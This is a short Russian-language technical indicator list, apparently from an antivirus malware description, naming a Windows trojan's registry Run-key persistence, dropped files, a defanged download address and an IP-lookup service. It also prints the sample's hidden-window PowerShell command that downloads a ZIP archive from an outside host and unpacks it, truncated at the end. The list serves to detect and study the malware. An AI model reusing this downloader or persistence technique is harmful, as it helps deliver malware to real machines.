Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'QznwSWwPL' = '%LOCALAPPDATA%QznwSWwPL\QznwSWwPL.exe'
- http://10#.#00.67.112/download/kl.zip как c:\gfgenfe\xhwcpmol.zip
- %WINDIR%\syswow64\explorer.exe
- C:\gfgenfe\xhwcpmol.zip
- C:\gfgenfe\launcher.exe
- C:\gfgenfe\msctfmonitor.dll
- C:\gfgenfe\staticcache.dat
- %LOCALAPPDATA%qznwswwpl\qznwswwpl.exe
- %LOCALAPPDATA%qznwswwpl\msctfmonitor.dll
- %LOCALAPPDATA%qznwswwpl\staticcache.dat
- http://10#.#00.67.112/download/KL.zip
- http://ip##pi.com/json/
- DNS ASK ip##pi.com
- 'C:\gfgenfe\launcher.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (New-Object Net.WebClient).DownloadFile('http://10#.#00.67.112/download/KL.zip','C:\gfgenfe\xHWCPMoL.zip');(new-object -com shell.application).namespace('C:\gfgenfe').CopyHere((new-object -com ...' (со скрытым окном)
- '%WINDIR%\syswow64\explorer.exe'